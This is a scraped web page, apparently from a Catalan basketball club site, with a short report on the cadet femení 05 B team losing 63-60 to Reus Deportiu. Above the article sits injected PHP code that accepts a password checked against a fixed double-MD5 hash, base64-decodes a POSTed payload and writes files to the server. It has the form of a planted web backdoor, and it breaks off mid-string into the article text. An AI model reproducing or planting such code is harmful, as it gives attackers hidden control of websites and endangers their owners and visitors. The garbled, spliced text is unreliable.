function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 05 B té la victòria a tocar però cedeix en l'últim moment contra el Reus Deportiu (63-60) - Tgn Bàsquet Club -

El cadet femení 05 B té la victòria a tocar però cedeix en l’últim moment contra el Reus Deportiu (63-60)

Updated: novembre 12, 2019

El cadet femení 05 B va perdre a la pista del Reus Deportiu en un matx que durant molts moments tenia perdut però que quan faltava un minut de joc anava guanyant. El partit enfrontava a dos equips que només havien perdut un partit fins aleshores. El matx es va mantenir igualat fins a la mitja part (27-27) però a partir d’aleshores el Reus va saber aprofitar alguns moments de relaxament de les visitants i marcar un parcial de 13-0. Però el caràcter de les tarragonines va sortir a la llum, van replicar amb un altre parcial posterior d’1-9 i el marcador quan faltava un minut pel final del matx era de 55-56. Però les roig-i-negres no havien dit la seva última paraula. La local Marcer va forçar dues faltes, va anotar els quatre tirs lliures i va catapultar el seu equip a la victòria.